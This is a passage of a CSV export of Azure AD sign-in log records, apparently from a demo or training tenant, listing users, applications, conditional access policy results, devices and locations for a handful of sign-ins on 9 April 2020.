JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:24,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",f240e889-79f1-4724-be47-97c8a1884100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f240e889-79f1-4724-be47-97c8a1884100,SigninLogs,Sucess,32.32146072,34.85319901
+399,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:52.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ba83dff1-e019-4605-9f27-badb36639883,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,Dynamics 365 Portal,bab47555-038a-4434-a931-96cc6091cdd7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",d71ebc6a-e566-4ff2-8faa-6cd726bd2500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],{'errorCode': 0},CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d71ebc6a-e566-4ff2-8faa-6cd726bd2500,SigninLogs,Sucess,47.68061829,-122.1869888
+400,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:39.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3840a0be-50d7-4be9-9f22-c9946093028c,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e950640f-89f2-49b5-9956-82780de61c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,e950640f-89f2-49b5-9956-82780de61c00,SigninLogs,Sucess,50.6406517,5.572050095
+401,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:13.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ea5d4783-75eb-4b4e-ac2d-cefa1ef54469,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e4ad56a4-20cd-4ec9-8d5b-ecb83cf91900,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,e4ad56a4-20cd-4ec9-8d5b-ecb83cf91900,SigninLogs,Sucess,50.6406517,5.572050095
+402,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:45.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c27bb27f-6b5f-4aa7-85e4-b0d8e9c81900,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c27bb27f-6b5f-4aa7-85e4-b0d8e9c81900,SigninLogs,Sucess,50.6406517,5.572050095
+403,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:33.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:18,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",3e761143-ab1f-4619-9ebd-16e243093c00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3e761143-ab1f-4619-9ebd-16e243093c00,SigninLogs,Sucess,32.32146072,34.85319901
+404,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:21.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,65001,None,Application X doesn't have permission to access application Y or the permission has been revoked. Or The user or administrator has not consented to use the application with ID X. Send an interactive authorization request for this user and resource. Or The user or administrator has not consented to use the application with ID X. Send an authorization request to your tenant admin to act on behalf of the App : Y for Resource : Z.,0,6f7a7811-5cc0-4954-aeca-302db7bb1af0,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:38,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",28530e44-06e2-4cbf-a7c4-b32699654e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],"{'errorCode': 65001, 'failureReason': ""Application X doesn't have permission to access application Y or the permission has been revoked. Or The user or administrator has not consented to use the application with ID X. Send an interactive authorization request for this user and resource. Or The user or administrator has not consented to use the application with ID X. Send an authorization request to your tenant admin to act on behalf of the App : Y for Resource : Z.""}",PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,28530e44-06e2-4cbf-a7c4-b32699654e00,SigninLogs,Failed,32.32146072,34.85319901
+405,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:16.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c8bb3ec6-7f14-4188-b853-f553d457a959,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 15:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dc80472e-764b-416b-817a-5ef0611a1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,dc80472e-764b-416b-817a-5ef0611a1800,SigninLogs,Sucess,33.7984581,-84.38828278
+406,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:27.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c0248bf9-ab20-45a5-b67a-ee3385d5bc4b,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': 